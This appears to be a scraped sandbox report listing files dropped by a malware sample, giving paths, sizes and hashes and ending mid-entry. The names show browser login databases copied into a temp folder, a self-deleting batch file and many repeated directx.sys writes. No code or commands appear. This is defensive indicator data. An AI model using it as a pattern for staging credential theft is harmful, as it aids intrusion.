C:\Users\Admin\AppData\Local\Temp\heidiJ4FeOlHkrixM\8ghN89CsjOW1Login Data For Account

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\heidiJ4FeOlHkrixM\D87fZN3R3jFeWeb Data

Filesize
92KB

MD5
cecd507c6f492a99481169aee2953402

SHA1
92eb8f999e617fe6389d446f86c13da4345a3591

SHA256
861e59e3dd349b246bbdbfb17b8771899df01feb9439e60e3f38cf5c221cfeda

SHA512
e8a2bdfa874c0141e41766dd416675c931ac17e05cd8afaa4b729e9e2deef317aa8a1a848976fcedae4ab39c7b88db42c1205a7572b283fd4f97068bd5ec424c

Download Submit
C:\Users\Admin\AppData\Local\Temp\heidiJ4FeOlHkrixM\r5fHrhgJVcR026czMDq5.exe

Filesize
448KB

MD5
2bb31c68f6a66d002832e4674891b6dd

SHA1
9a5fbbb9d856b0a76b54f6a77d2bc9bc4a76dd88

SHA256
a001203ac063d852966ea4726164395e01861ae6312e79122701bf341d248504

SHA512
a0c1e4cb0af4917be1602b0c03fb4384b9ee8fb87b1e408fc0f04199ab08d07f7f3ecdae6a16cf8dc71fff370d3755dd1c7b6e34146d84fb3f2bf73d8c610200

Download Submit
C:\Users\Admin\AppData\Local\Temp\killself.bat

Filesize
409B

MD5
3d0edccccd5bfdacaf0af037af95b1d3

SHA1
54887044c8694c994473856c900c376dc619dfa4

SHA256
447d300e937eeef7cdeafc5d65c60369e907e9ff442a68ef316e9ed3a33921d1

SHA512
9331751298e2284151805972d55dee1cd939f3002d9ebf68b8598e56fe967a996db7d469f23e5a2b488f33f7df7823b1a250fb705e7a5591363a641829f147e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\mdnsresp.exe

Filesize
419KB

MD5
8a716466aa6f2d425ec09770626e8e54

SHA1
62fb757ea5098651331f91c1664db9fe46b21879

SHA256
585d1fb4f288974b683c5abfb10c97d7d2ae3f59c2bcfd78ba272e3be2cd7815

SHA512
54f11067e400347834689b4532ae53b00ec96a3ca90a2c21de27942f4ca30306fdda0522c1a3a4cde047ad650162e2d8313205220acaab4cc60e010965690940

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsl4616.tmp\InstallOptions.dll

Filesize
14KB

MD5
d753362649aecd60ff434adf171a4e7f

SHA1
3b752ad064e06e21822c8958ae22e9a6bb8cf3d0

SHA256
8f24c6cf0b06d18f3c07e7bfca4e92afce71834663746cfaa9ddf52a25d5c586

SHA512
41bf41add275867553fa3bd8835cd7e2a2a362a2d5670ccbfad23700448bad9fe0f577fb6ee9d4eb81dfc10d463b325b8a873fe5912eb580936d4ad96587aa6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsl4616.tmp\StartMenu.dll

Filesize
7KB

MD5
a3f1e5d94d8e07121bad59af16ef358a

SHA1
9223fa516807ec103e5381ce8b2b7295a846a89f

SHA256
bedcdb63f027107c471fe244554c3038fb4caf9f96f7eab2d430f76f2f4f768b

SHA512
6b466ff8dd9855048dcdd3b21760bd0cce77b1aed561d8cf2099089b97910f8d2da86970a2023c59e1807a45138cc25fcb899f9df67845bdf22a44ec7b491050

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsl4616.tmp\ioSpecial.ini

Filesize
662B

MD5
16775224981548a35781eab0e501c622

SHA1
76cb2239bd74e5d2bfd2aa0291827f50ecacbac8

SHA256
a44f1eaae2de7608a7b4a3f72040b29af3b261ea74f7c58c5c412f5ab6094ba2

SHA512
acc75cf82796aeeaa5c07637468984afce407c1014c6b60163054fa868f7825d7fde6adcef612d12789074b542255aed5bc2566840e0b54b63ea2adce665e0b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsl4616.tmp\ioSpecial.ini

Filesize
663B

MD5
4fffd67adc1542e024bf75e3d69e3653

SHA1
991d708112a7ade0defbc6187c9365e96d35da4e

SHA256
bb183184b3e91abf1c59c6db6e884292a1c64f559d3bf376d277191529dd06a9

SHA512
38cb60004c09a2fe978c55ae82ea11c5149f9d42a1199f0d5a43a3a1acb039494f67d9ba0a6cae7a7064a0db19fcce82d2a182e06aaa9d438c9a69a348d9870d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp5023.tmp

Filesize
8B

MD5
ccf8eaa06fd855aa49ba9b4f4a412898

SHA1
deee94f602b1bff508d6e6d87bb7fd379597863d

SHA256
95b9a4180c31dbf45fd174b1cf17aa70cf610f17bfbecfaf95dfaa3a51a3dd31

SHA512
bd99781895a0516e9afcc11305b71c94da33cd6313bbcb0b6634dd6582582da38451d4cbb617a4a43333df9b58c2cb52ca8f38c9475fef4d3eeb0860ee404ab2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpC36E.tmp.bat

Filesize
168B

MD5
1334d9e0447cffaef642eee91db2afba

SHA1
135bc95476dc4de0a516a69c1b2b091f8b82f25f

SHA256
263a08b935f32d06dd13882c4ed2f2154a42bb90a298fad17638e880f750594f

SHA512
cb588447ab271474c07227b191d3777a7aed438bb2902d1623e333c932b902a24f134d663d2e04252feb2711950d4de224b71e690326cd4d1325660424ca5200

Download Submit
C:\Users\Admin\AppData\Local\Temp\u27s.0.exe

Filesize
200KB

MD5
47053e2e6c2bca7ada046ee6dbeb9df1

SHA1
e61cd65ba69c16dea7e04d3eb2b0bb0e16f59405

SHA256
45d7caeed8deb239fb228e5fa591e2e7ca546fb4eceab134f29d311576b45995

SHA512
9507e0f46ca9eeba29267b849ede53c1ed7318828a86b74aa2e4c659926ce22b8e25f2f9539681166d71d164134040b08c22949a6fe404b10ef7ce31a00e3b44

Download Submit
C:\Users\Admin\AppData\Local\Temp\u27s.1.exe

Filesize
64KB

MD5
910160e00d8244ada9b6c3669b27a3c5

SHA1
3db8d9da512154f9a97fdf0bc61fb85840b414a2

SHA256
831341cfb12a30ad59fe39c06fb60cc4edb9091669b2cc5c22b50548912232c1

SHA512
ad672f5ce38c7c6dd13337af1f4833daac4adf4a110d2156b8726923c877375406e7fea24c21088f5a82a7ceb01b6030d1a7fec7e59253ce423be8dffa6da439

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\22JN4X52CCCX9WYX0ATA.temp

Filesize
7KB

MD5
591e48b4b69715b59a38de8eec8b848b

SHA1
e222a22f738e2db1614d8d9ac2c1ab67659f7c39

SHA256
ebe7a0c83c496bc1e2550dc03e3acad4afc5eba08c4619f21ca58169c1d0fa62

SHA512
630dee2debe0858fcd18040b361478c7f1cd42d4bb2367127d1edd610cd75b5e135451e452fef0da8caef5f9535debc292d89b7a93bac325a302b06b1e48c53e

Download Submit
C:\Users\Admin\AppData\Roaming\Temp\Task.bat

Filesize
128B

MD5
11bb3db51f701d4e42d3287f71a6a43e

SHA1
63a4ee82223be6a62d04bdfe40ef8ba91ae49a86

SHA256
6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331

SHA512
907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

Download Submit
C:\Users\Admin\AppData\Roaming\wshom\log.dll

Filesize
101KB

MD5
2fa3b395d39fb17762d35042153e9abf

SHA1
a1972168b08a1fa8d6fe75dd493f30119c03514e

SHA256
c12c8759549c64ef3002c0d0c5ce421632e98edb4e99175a2673af2bdcbd966f

SHA512
47566fd4192e93e8cdce2444298a29c37aad09e72ec0393f44549e8b481be135b01a6a6c1caf71f92a54edb9cf72ab3d449a7fe51fd8bb60e9ec2d3710569549

Download Submit
C:\Users\Admin\AppData\Roaming\wshom\xeroderma.wav

Filesize
5.0MB

MD5
ea9467b780693eeba8bf9769f0f32b1c

SHA1
a38bdbb98b16d97eeb5bd62cfcd6341219fe96b2

SHA256
780b4def736b341d7abd84ccdf3ec57f58c8503e442b99a70a952c8c80c9029a

SHA512
ba22ea81c037af7ba39a88353cd1c2e74c460840594e3dd5bbfeaff14452398dc8e686d3c8cca51bb9ebba4e001d2b99e61b75965e773d7bbe150f42133c4af3

Download Submit
C:\Users\Admin\tbtnds.dat

Filesize
4KB

MD5
9f288ea9c486832c265a0aa1a9a97204

SHA1
0f68ba45f4f5ea9f90ae719d179366d2720cf3f0

SHA256
9ae33c56e88d58e486bf385bc7a6cc6e28a84f14c7421313d7a00fd3172c3411

SHA512
21b9bfb5f880e158c647e61b2af09d6dc544b3a6ecbce6be619c110125c1aeafba6aba464ff35f11f1461db91f83229c4e2a2b907041414878fb9cbfed3573b8

Download Submit
C:\Windows\SoftwareDistribution\config.xml

Filesize
516B

MD5
92714417a26162d7918c9875c70f8ed9

SHA1
e017c2eb9e2aad8b8bf1f24e7411d28165242a7a

SHA256
1e6f789ba5f3d163e06cfe7caf54b366971ad5a0a5e54c8f76e3523a36f6a24f

SHA512
de27961363f22d8ee3f05cec3c32bd359b90c1ddac43f5dfa58b01d50c8195b24834568d6287726b74bda691bf1ab321790e61dd8eab225cebf1ecd107a676ed

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
0dfd17741f77e1e542ccdf252ae040cb

SHA1
cdef6ea993142aff2e55f64c03142ff46810bb2f

SHA256
e45aaad7b571dca5cee718a506c3f3627f9974d0594e53c2a43ba8d03a998e57

SHA512
c4d241b5ad66248e3e94e731a749b6fb62010e80285029c41b71e0e2dfb78658eea3cfc054d341b3db671473b72377aa9c557480f42cfa2dd40cb2beb886c8b4

Download Submit
C:\Windows\directx.sys

Filesize
33B

MD5
7cd2659160ce2a9565d391fceb6cb579

SHA1
35edf70e395d8b72a0b8a26bf6c54c002429130a

SHA256
341e84629f81207ce403874e5becea2bff3fb8c7a5799629010b082378138d3b

SHA512
61124e23aed0cba4c31e485bab5debf91baaea70a3164202b1d1dae4a266d0467cdfb6b7457b89896dcb30de594f1703f8b2ae38de49202fba634099ba7e37cb

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
993515d8e0e3f814d3b8295b9b745ce9

SHA1
beea92f180f4356f9ef3695180712c9138bcb857

SHA256
0c4ddb331196b538f99368b9d2bb2c941a4779be09952db0edfcf38bf9a7c7a5

SHA512
a07f1c0059faae57d3db18e311a34c3ba6f0b50adbf50d4e20d17b17bfc2a8578f2aa061275e497357bbe0b48315d9c3a8011bde0eeb668fb0907b358732d8fc

Download Submit
C:\Windows\directx.sys

Filesize
48B

MD5
c970531b2ed1629c0cbe5a72f0a41c00

SHA1
fd74d7784e5b824ab1559dbc4ee9d3a59d4ad66b

SHA256
ebd7e31a6649869ec7ee83f76ae748bc04ca3f67b79c231a97ce6a961f23aa22

SHA512
87d9c0bce20a270c1ef2bb91f3021102c39490a061c42aa6f56c740104ca1face3319f25c5a37c8d2c099c80fd9fde27ce0167f94c281a6be1a25b188a833495

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
cba7fb4a3aae30c1175504fc3d6a2547

SHA1
939ace4dae391e9071047ef661d1ff5406d8ce0a

SHA256
d0d69d62c0d23e57ea4bb71595cab02ed3b90f1b34b16f21da75759489a459b4

SHA512
0b0cd1778f88065d22740a2775f3f644c602ccd6939757b66dec18f786818a7a0f7f67e1546d45883aec30faf694c42dbe8f0af2141274dcad0d13c291b1e62f

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
3f6da78e356633ba6f8acc4a09fd9527

SHA1
407257bcfeb33c069de3628024c8e04687de48df

SHA256
83ba0112fb5874a7d9d677e8575d0dde3bd3969139f125550394a3f04f6ebc49

SHA512
d1f70f7ae6f4bfdb39f64da356770daca17172c5d72b622d59ef9695706b67431daa68f3d7e0c6d6cf04da6d11f8bae9abf1bfa907870bb5a63e70a3c0090c21

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
17ba8057cf11b90551b437aac463073c

SHA1
d6dc1b0e8aa6c7a361d428e93014dea724ce9aa1

SHA256
7e2878a09603f5c38dae078c08d4003bfe3049d05c1dd3dbfb7e235b39080f67

SHA512
4ec8a3dc5d14282ed83e5909cc92469748bc8e1cbfaf2592044e812a7ed1b017a328cda0dc2b905b12e4a00681d2c86708863e76650d56b8455e54b85c954e2a

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
e006c9cc79628dcbb59929f0674c3085

SHA1
83abb3b1937b22dfcb8eff1faf8264b9bd9b5c3a

SHA256
c4c5f5d4f92d3c641629cf172b32ef9050adeba673165db6d4058587b04bf51b

SHA512
a77dd704412ebbf9621d5ac0e832710afd28759bba60a2e3c6d8a3e409e4c97944b82b2ee840e4d9aa0f1144fc9818b79c9795c9dd653cbf8d1adf5b9b39c842

Download Submit
C:\Windows\directx.sys

Filesize
52B

MD5
8a983602bb55457e6a943cb3cf398332

SHA1
00515f32ddc820e280c2b1a1672441e75b2d10b9

SHA256
8c736b19672274b144c746e2513f8cb2fe7f6efd63245071cdf59cfc5be4a14d

SHA512
ba5bc1432223f352b202c82af6446f87c68e7a62d4b50144f87ca80484e1d13c51f32bcc0dcbb839e0e30d1e61345bdaaacc7aa61ee1947d26f376a3126c8a70

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
dc2ab21158cbe109d8ef8c2cdfcb9e28

SHA1
72e108ac7b129bdc3d01457b7a41638747ff5e69

SHA256
106edba5713df03b755a60c8296d257dace2f69b97658174a1c7437d7f1c4d99

SHA512
2a759c6bc9a1ecd7827584184a8e89162a1ac9dd2c1140e3994cd6d4c7ade9987920c517840a765c82c103d77c7bac49b803dbcfebec794cf1ffae11f9c0cd8b

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
0144b58c9b9e22efc34a5bdde8c1abc7

SHA1
4c16c3b3872802e156448131280f8e1edafd4343

SHA256
3ef4c308663d165ffdf8e85c775e53c8a420494f6e119e97b62d176c0069f263

SHA512
eb29b99b427f249c6424c1abd065475fecf06c2a762e49780b5c9071fa4049c8b532464de4a10e3c4c8a10706180f58373df9cd176b4c199000e5b99c7e4e457

Download Submit
C:\Windows\directx.sys

Filesize
48B

MD5
e567790b149267e4f2edbdd18a8b8698

SHA1
7ce3178e1a8c76c7d1d0d64341a2117688d15c8e

SHA256
eeb939fc43bfa62b8c4b8b45802a0437fffdfdcf66022514a8e032df707aadd3

SHA512
83b6e7305474f531ef75e9a40af97093b171264851402dd469352221a57844bf035e186952011d078f98114ac82ae78f60d5a0d89e353a6c833ab5d22f4722a9

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
9dc11f256b5d4c902e678bf83ea26487

SHA1
a719b5b4de96d8c1f46aec112e81fcd661db5a8c

SHA256
ba5a8fffec8643ed74662bfd0b20c2a224b7a72196248a9cc7eeec47d9ad4443

SHA512
5a6578f6c62273185b9cdab5e4324fbedc99827ed162b19b95200258340cec0f90ffeba277e357476bfc623f9d5395897358eecda5040874cdf984ca1823eb8d

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
3f6fddadfb4c23393d5bc3597c536f69

SHA1
4a439578281b7083bca8f19c7d481680f5f452b8

SHA256
f74b966c7b99f79d38ead6a25e937f3378cf91b8dc9c6cf66c7b420ee975ad6f

SHA512
de33eae8ed48520c8ea96ac44c67e7b6ef1322c751e08b43700a3696e0c08752bd47e0e0efddeebd38ff0d5572aa757052e3b36008b6a20b4197a913cfc31c8f

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
2f77fee058ec5a8be4abafe6d07bf766

SHA1
99b7d0c7d587362f6c68706d66270e8ed237a47f

SHA256
4b53ad05bb3a81974c5b50cc3c9c033541088fdec08667eb548c36338f12d916

SHA512
d1546d7dc47894f55315d5d732b315cb99ed234f2bcdaab25ff732d43ff7406a24bd1757f0ece16e8f5efb5711050546899e7f16d7fe769b32b0ed94b080a28c

Download Submit
C:\Windows\directx.sys

Filesize
44B

MD5
4530ea9d39dbc63e467af34b38deca26

SHA1
c0ba0ac54080491848a4d608cbb5a7d211f065ce

SHA256
5376ba9bae9f633b25d02653e6fdb698e0059dac7fcb6592a32ada490edb37e9

SHA512
4ace7ba77be3f39c9756719f4017c31d736358e74ff699e52489c6b89dc1f1290e51363b8748b3d274dc205f2a4c7bd61d32b8a43ac0f5487e7c167cb2862aaa

Download Submit
C:\Windows\directx.sys

Filesize
46B

MD5
cd0bbddc3078531c9f2dd9de3ce72408

SHA1
3dbc27f81262927e0a2644ae3a0a50779f00ccb8

SHA256
cf6804ddd42b9495633f9a92bc534dc2306e1056f68b29cca9a2bd6107ac9049

SHA512
bc1f2ec868b9a1a6528389656af6164f984da30cc4a5df0d9d8777c9e4c1176889184c1d4723dbfa3844b5a1bd04230b73244c204477c43547ebee2b4457453b

Download Submit
C:\Windows\directx.sys

Filesize
46B

MD5
4f5012134b9f2f413e3f2f55c543eeb8

SHA1
5ce6513eeb1dc75c4df16965dd2e278384cb7112

SHA256
c35ca4abdc8f9084db2b9aa5a9e2c33b4ab7de492ed0468224708bcb4569e280

SHA512
33039224ce97fe04808fd355f99faca514c85e1908b1c169b1a23340ce8f0fb6cf5a5d07e8810beef7833016dc202e18822984d2cb731357ecdd8640d8fad8d5

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
ef5d6aa482bcc9fccd880566b7334d73

SHA1
8039fe8495c2105d21fa98362fdf92bdd3e823fb

SHA256
91aee616635ed83ce8a1d383a176c82a2b52dd6676c663637b33eb6632899542

SHA512
97056f1441270e7a5cbbeaf3d74a63fd81ced2b3124d06219007d55a85a992d683945d5d4521e3edddfa3e594942c926717bdf1e75bdbadb6d917fbd2f64b59c

Download Submit
C:\Windows\directx.sys

Filesize
49B

MD5
85f22043b3934620acb4e9bccb5a1552

SHA1
36139852143fcbceead2d82213590e8b933c66bf

SHA256
587a5f930a11b0772cc326e85a21e36a2317b298008e4df7e55bd03a39bd8645

SHA512
92e3b9b4c8383f9d524ede79c4a073944d17170b2390872542e5f7ce0971924cdea816691be8384c24f3b1dba610101ef0fcd90c6b43963eba7210d9255cb964

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
3757ec899aad0b6ad191b5cf3200b4c9

SHA1
3f8bb8fec70916a3f8e8c8b43b79e4d975d1e3c6

SHA256
b9e34328e91399389e96b7cb45b8a80875a6957232250c224020acf96ecba4cb

SHA512
f1238e82d21a4e1ec4418a471673ad81024cd49e066e11955fd8efe18a1759e0b88b28a6592be02eb29d7d085590943f8c6c39139088c20c04853bd4fc6e4c92

Download Submit
C:\Windows\directx.sys

Filesize
48B

MD5
06e1f5c93648430c96e117d6ec12834d

SHA1
1a9d81222656fbc8f5abce880617bf98dad37543

SHA256
15f7849522efbf34a8dfd1b91940beb1e51344f9cbea187a81f2a06bb5d010b7

SHA512
2fb9aa1e8c309f9d117d6e86f5c59fd8d6ba8fa5a79360612e6a44caf4e4db181ad391172804cf6597ec49a44b7d6a9fa4cdcf8216f0ccab970a1ac0479ed36d

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
b39793e9bedd8bb82b221ccbec725527

SHA1
56fb5cb29b8fe20ed92453d7599e53e8ba45081e

SHA256
5afc69195b52a30e603b57ca9331248046de9aff017544d8e5a318c9369fabb8

SHA512
d66ecd5d9eee6624595aa0c1e7f601fc2fa115a0fc1e1cd53a7f309e79762430e41b4cebf5e7f88c36ac4e37ad15c5df66bafa3b0ec6d6bd4183d08bc7568d93

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
4f4d924d2584d145b5b6b9b4bad44fdb

SHA1
9ada6b02192a14219601e5f9d862dee7779083a4

SHA256
7293d0a3c14173bb9ca7f33ca33387b2e774980aadf6865ab315bc756d1f9432

SHA512
e0fb71d6c2f0d6cfa2647ebc3ba3aa7777c1a6f398da4d670a0853f26b0942590c00bd49f647a4ee6403b42fbba87f603dc12c047ab37b66dcecb40e39b08abf

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
a942d2a81f773a1a56e08e5b4743e707

SHA1
c9458342740188bf6846176f06185bf3873df9db

SHA256
dfd4d9ee10f2b0c67aec6da42362decf34061b31dac289288f46e1c3c471aa4e

SHA512
7d283cb2f383f19acec1dad863f498d08f51f6b256ef52b8c7412931f299f39bb992dfff7d05c0b92d651c4f73ae3a101350d349226b965bcd4ebfde3025b8de

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
002ecc25f136b21fd7dba95daff2eee5

SHA1
d36dfc52bf659a769822ea9e6856f01cb07e7cc9

SHA256
8ff7ba63634400b0b62715ad2e4ff551a6f166b4a30da44405e12267947f4acc

SHA512
89f75e31bc8b13549e034ccf7c75077ef9fb6745613d964cfdedbc0dcc096c2f777ce517a7c34d911f90ec4f77c303fe5421fdb7b802d8fc08b5adc2c6b46bc3

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
c131a1381dfd470f47cc156939d4432d

SHA1
abb6c1a804929420c89d64e6f2c9f3603b7ea07e

SHA256
02a88b0f54587979fb66f5554da42c27d5f1e3bb0752a999a32ec7111f33b170

SHA512
61559cbdcc4fd9dcd6f0a1284266be73628a481a217581e47c0badc932511520e2d4b47396077dd076fcdd03d552d5d35790bce7cf0cd91b6b2a99b1ec0d8779

Download Submit
C:\Windows\directx.sys

Filesize
57B

MD5
64110e13487d2ae8dfd2afd2aaf023f3

SHA1
5d74aff2e73a390cad2e9d706b6ad83b28e681d6

SHA256
eaf60988de1fd282703c23479186396a273f0b762d7357d5e22a99ff2895ff0c

SHA512
0a6746f4abdded24fb83ab53bf468faa823dc243d4fd620ee2fab8dd05517f2ad81c8025874502e2819dc7fd13ad1a884e735cda90aef17923c127deaab4efb2

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
6e56e1de50592503044f97b639c4ba4a

SHA1
2896b56e833bdb26d1bcff17bc1249910fee0ceb

SHA256
0d4dc4d20c68eb317aaf8a778f13ac5d654ff4dbe85b108eeeaeb246542beb01

SHA512
462ce7d8b0d344e9e8bf3a168dbbdbacd5f8b9a8022c72eb0af9f8b4a944359f240fc38bf29d0561f71d19de40215b79b4dd5a256e629ae6d9ff5d16f3b987d2

Download Submit
C:\Windows\directx.sys

Filesize
57B

MD5
12712f3fe3293f812dab1658d335a731

SHA1
35403dc002fc3455c7c97bf13f9389d57a4dccb9

SHA256
c9e37daf7aa166f0121ce2cb6d12d3790c0111b470315bfe35fa9eb7fe2c7a38

SHA512
577737b3fd89d5f4304c43edfd1747e4f8d994d485dd8605209e5b85e2596d4dd865ea0f5dd7fa6529e02a893265be9d33472651a0eee915408270e589603f21

Download Submit
C:\Windows\directx.sys

Filesize
33B

MD5
48074663d65be1968b6d38fba27cfb9d

SHA1
5b23440ce1976b8472bc586215cc23c515498e4c

SHA256
17b685b05977c384b09a328064920abd0a64e8bbc1644a4bd92ce00cee8c356f

SHA512
33b2dd9e68092d5083cf60f957bb576925f8baeb3fba8731f35d73626e769f6157616d0fe1edb8a70065256bdaa3ffe8564a0e4248b16684cc1d2299533431d9

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
b35add4e2f1415fa229ad1a045908886

SHA1
6abf8f1af0426e1a3bb523bdd7b4622ad62766c0

SHA256
f2e26be739a4c9f80b51ef36eb3c50c96e919fe84f2c24d39d996444516a35c1

SHA512
fd3db9f7fe0569df4c6711edfe1a98aca3183981be1693ed027cea738f8bd5c15e4b0b5d40b29e1b7d2013d3cc9246e4ddc056b924003f4d5e1677875e5660bc

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
c0b10143454d77739a368e04e0f35df5

SHA1
f3af68a474210444d81d85902d20e1b358dee3cf

SHA256
2917e6960136a725e02b583e48084f2d01e6f067b0e0c48a903cb9e87cbcc084

SHA512
d7a195e2a204bb8735770e8b69ecaadd209b59f0f80548f19294301cc11b7f4e8b818d0fe4075faed3cc6012654afb0447057867bb4d2e96311bc9474ed6c01b

Download Submit
C:\Windows\directx.sys

Filesize
57B

MD5
ee88a30f6fe222df3084d083ae794a59

SHA1
d1ac59b781e5821b75771ac0f6787add17e948d0

SHA256
746f3becfc65b8201f9bbffa9f91485f054e710d10aed246f83f493a5e516975

SHA512
2d7bb78421303476b79fa0811f9d195c11f80ea81a85818a9bcbe58799cda4ff486272f364d2523dc9a3f872b0b4fa3bfbaddebaa97472caee1553797ffcac9e

Download Submit
C:\Windows\directx.sys

Filesize
49B

MD5
6c01af52de11947aed5f4e99b1fe2287

SHA1
bdf3b500870e37655b68a8b15d2611630518dba5

SHA256
97dbdcc566251d52bab943eeb6c1d0b718662af3cda5671f04ac1e90a109f1c6

SHA512
2595fecf3d00929a3a65bf6183c992686807809d6e2e8846deefbee9a631222c12f2ea1e3569af4ee4c8678017371796e4a382d580161ad15d7c043d28564f1c

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
acb01e656696e3e20495e9f31b629b46

SHA1
0d32caa8a8d2e531e9d390a0f1c22cdea82c84e0

SHA256
67447e8801412d1c801807ce7685cbd101b32a588f0504736475b896d9cd5b98

SHA512
baa404c4b3450be17b021eed9fd3a2a14797d0ba7c8a1183328f4a7525cf8c45b64e4ab91bd10f9ce63f1b887a0b5d36dc29bb79a7b23108a5f586cf0ab4feb1

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
9a590c7cd510dc40ba126ab3262b65d5

SHA1
6007367cfd74dbe7dc420793bcac6354ee76d2d8

SHA256
18732ff74ed85bd537a29faac3d107272773b6cd8d6edde234020d421f83e785

SHA512
ad3efd94780c73ed3940d96af5ceb632e0f2ca3bd8d83102edd1374e710f0a33af4b2d1d21f604dccc6ad6d73cef16cf7a99eda529469c2602cd026a9cebda10

Download Submit
C:\Windows\directx.sys

Filesize
60B

MD5
9deb84db67ddf4fbcbbeea713236c444

SHA1
aa7dd906e2b1d909e2a83d27e17dceef3c64cebb

SHA256
efac846620a73f89157c43928bc9362bb783ec690bd5f7179683e17a32fba64b

SHA512
0b354c1287b131376040be8c817379fcb8e552836838339336a3102476baa2cf3e4a58667ddf091411d02aecf9e38ebff1c1a838449d5fcfedf85bf54254bb3e

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
3ef4be73b6957ef8310ed7bb35cb81f0

SHA1
e13e151d8c5b894b8b1a66439bf43b848761ff09

SHA256
4aeafc821ab0ef8c0940b029c666f9f6ab9a5f2db8bad0e428106ff9b4d8245a

SHA512
02a5e5bda3836fcb6d4dd0bfc6cfbc4b3bf4c9131a6d2db142f2313e83557566e9994fcb0a7f64d7c94ec14511406e9831e5b3eaab692cb34f5571265437fff9

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
c3c2f690f46b32ca9d35af7853775b4a

SHA1
9047c18af7c9358c4677c00baff5aecf84bcd616

SHA256
b071a77d923ebf7f6e3e31a02d2ff500f43c3a0b7eb86d41ea4445143593054c

SHA512
fd11b14df011300db7d38253a0e3199db73dec4c73008ef3ce7804bdf0c26e49403a87865ce02cc322507d0f6b80175d16cf3cb9dd720e1a2ce5ae3c8b25210f

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
28490a4132ba1d903d259f44b7d715a9

SHA1
e1ded0ec815e8b17c3e412607ca26ee9ad6b3dd8

SHA256
d77be11467965cd7b156667c4a6c333eec1ff9b897ca81b570a6c04f4499c27a

SHA512
1634a864e95b2a27117cae7bdbd457598c7681531e8bc5921cb90cd27048b1a0f23f097da8c71d2207776219f11024b05015cb5e5a198c7d3dac67f03d52d70c

Download Submit
C:\Windows\directx.sys

Filesize
48B

MD5
ef985f267fcd879467b6b5b54c9adcbc

SHA1
e74a4e15b5292cde36f64203ec807c6449059ab9

SHA256
2f222c16531c8ab29119c8d8b118153fa58ae7da2876277533ea231bf59d6f2a

SHA512
3cb525000c87c7465c11a3ed4a83975da1755f1ff4684144026149775dd76692327d3c0ad403395535a4b63a27d9c8bc8ef38a721b40daa42b01fc891355fec8

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
85f082feba85dadf5010fbbd1bbc595f

SHA1
d0e5ec7c01e6f9e43b89ec88bdee25a149fe2222

SHA256
3d63ce63ef2ceb0b6b4bb21df3f19b54c1a3d1eb18ca183d483cfdf146548063

SHA512
d51badbbc601b142a8eeef6dc6d66c551e052b740130e03b0bc3ab53519a90c85aecfaff351dc3526e163276df8241b1a82276df6bc26a5df7b14c0ce4ecf885

Download Submit
C:\Windows\directx.sys

Filesize
57B

MD5
ff1a2eb40d965e45064ee75861c417ef

SHA1
3f5f79c06e0f463faccfe8df0e3fcd44ed5f2c2a

SHA256
ea6baf6b7dfa7489a1498e1751b66b867c71c2c9faf0ad20ead30f3e1889f29b

SHA512
3de027eaa61fc7f50c3f06485d972df0f47dfc2c7e0b606ae02807773d836de32a5f2b9e1bcd26a10e016f302942684a8b7add0eb359718aef89feb782d6f055

Download Submit
C:\Windows\directx.sys

Filesize
33B

MD5
c1a166eff5da8a76a727aa3a09ca4f20

SHA1
f04ecc6dbcce0a3402746b8d25ae544adfd351c6

SHA256
ee92f75fc748d6f5685db8ff2b24c227b2e4eb617dc1d1f3a2c274e2b7ae2f25

SHA512
2d6d7ba92e18cc337f6a9194cf97bc6200f431923d29b27f86c270703b2eb25d2165436740ff8fe35e63c8ddb9586f05622b5f97c8363339aae0fccb5155f7c7

Download Submit
C:\Windows\directx.sys

Filesize
48B

MD5
c3c9ca310cb8084e0eb071d5363f3ea6

SHA1
dc0e2e58fc5f986a4404153aafadafea08d5517e

SHA256
7e7a138a8d9047bc1b86697f6d0be329d59009f480452b09548016fe581e6c4b

SHA512
